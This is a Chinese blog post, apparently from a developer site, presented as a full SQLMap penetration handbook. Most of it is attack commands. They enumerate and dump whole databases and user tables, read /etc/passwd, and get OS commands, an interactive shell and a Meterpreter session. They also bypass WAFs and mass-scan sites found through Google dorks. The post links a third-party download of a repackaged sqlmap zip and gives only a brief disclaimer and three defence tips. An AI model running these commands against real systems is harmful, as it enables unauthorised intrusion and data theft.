SQLMap 终极渗透手册(2025全功能版)

超防局2025-10-25 10:26

目录

[⚠️ 法律声明](#⚠️ 法律声明)

工具下载

[🔍 基础侦查](#🔍 基础侦查)

[📂 数据枚举](#📂 数据枚举)

层级式渗透

批量操作

[🛠️ 高级功能](#🛠️ 高级功能)

[1. 权限提升](#1. 权限提升)

[2. 系统命令执行](#2. 系统命令执行)

[3. 绕过WAF](#3. 绕过WAF)

[🎯 实战场景](#🎯 实战场景)

场景1:Cookie注入

场景2:POST注入

场景3:谷歌黑客批量检测

[📊 结果管理](#📊 结果管理)

[⚡ 效率优化](#⚡ 效率优化)

[⚠️ 防护建议](#⚠️ 防护建议)

⚠️ 法律声明

所有技术仅限授权测试使用!未经授权渗透属于违法行为。

工具下载

我用夸克网盘给你分享了「sqlmap_CN.zip」,点击链接或复制整段内容,打开「夸克APP」即可获取。

/~339038pE3e~:/

链接:https://pan.quark.cn/s/0d3faddb83b2

🔍 基础侦查

|-------------------|---------|-----------------------------------------|
| 命令 | 功能 | 示例 |
| sqlmap -u "url" | 基础检测 | sqlmap -u "http://test.com/news?id=1" |
| --current-user | 当前数据库用户 | sqlmap -u "url" --current-user |
| --current-db | 当前数据库 | sqlmap -u "url" --current-db |
| --dbs | 列出所有数据库 | sqlmap -u "url" --dbs |

📂 数据枚举

层级式渗透

复制代码 
# 1. 获取数据库
sqlmap -u "http://test.com/news?id=1" --dbs

# 2. 获取表
sqlmap -u "http://test.com/news?id=1" --tables -D "数据库名"

# 3. 获取字段
sqlmap -u "http://test.com/news?id=1" --columns -T "表名" -D "数据库名"

# 4. 导出数据
sqlmap -u "http://test.com/news?id=1" --dump -C "字段名" -T "表名" -D "数据库名"

批量操作

复制代码 
# 导出整个数据库
sqlmap -u "http://test.com/news?id=1" --dump-all --exclude-sysdbs

# 导出指定范围数据
sqlmap -u "http://test.com/news?id=1" --dump -T "users" -D "app_db" --start=1 --stop=100

🛠️ 高级功能

1. 权限提升

复制代码 
# 检测是否为DBA
sqlmap -u "url" --is-dba

# 获取系统文件(需要高权限)
sqlmap -u "url" --file-read="/etc/passwd"

2. 系统命令执行

复制代码 
# 执行单条命令
sqlmap -u "url" --os-cmd="whoami"

# 获取交互式Shell
sqlmap -u "url" --os-shell

# 获取Meterpreter会话(需Metasploit)
sqlmap -u "url" --os-pwn --msf-path=/opt/metasploit

3. 绕过WAF

复制代码 
# 使用TAMPER脚本
sqlmap -u "url" --tamper="space2comment"

# 设置延迟
sqlmap -u "url" --delay=3

# 随机UA
sqlmap -u "url" --random-agent

🎯 实战场景

场景1:Cookie注入

复制代码 
sqlmap -u "http://test.com/login" --cookie="PHPSESSID=1234" --level=3

场景2:POST注入

复制代码 
sqlmap -u "http://test.com/login" --data="username=admin&password=123"

场景3:谷歌黑客批量检测

复制代码 
sqlmap -g "inurl:.php?id=" --batch --smart

📊 结果管理

复制代码 
# 保存进度
sqlmap -u "url" --output-dir=/root/sqlmap_results

# 恢复进度
sqlmap --resume -l /root/sqlmap_results/log

效率优化

复制代码 
# 多线程扫描
sqlmap -u "url" --threads=5

# 仅检测不攻击
sqlmap -u "url" --dbs --batch --smart

⚠️ 防护建议

  1. 使用参数化查询
  2. 最小化数据库权限
  3. 部署WAF防护

💡 提示:

  • 使用-v 3查看详细过程
  • 复杂环境下添加--flush-session清除缓存
  • 首次测试建议从--level=1 --risk=1开始

👉 按需组合命令参数,注意操作风险! 🚀

相关推荐
treesforest13 小时前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
BD_Marathon14 小时前
SQL学习指南——视图
数据库·sql
上海云盾第一敬业销售14 小时前
深入解析WAF的工作原理与机制
web安全·ddos
2601_9620725515 小时前
李梦娇常识4600问|题库|打印版
sql·华为od·华为·c#·华为云·.net·harmonyos
憧憬成为web高手16 小时前
l33t-hoster
学习·web安全·网络安全
HackTwoHub16 小时前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61116 小时前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
Volunteer Technology17 小时前
Flink Table API与SQL(一)
大数据·sql·flink
爱网络爱Linux17 小时前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
持敬chijing18 小时前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
热门推荐
012026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?022026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?032026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf04【AI】2026 年具身智能模型和世界模型总结05GitHub 镜像站点06HTTP 与 HTTPS 的区别:从原理到实战详解072026年6月AI大模型全景报告:GPT-5.6、Claude Opus 4.8、Gemini 3.5,中美AI三足鼎立谁主沉浮?08上线仅72小时被强制下架:Claude Fable 5 的短命09Codex 下载安装指南:Windows 和 macOS 官方版下载10AI科技热点日报 | 2026年6月1日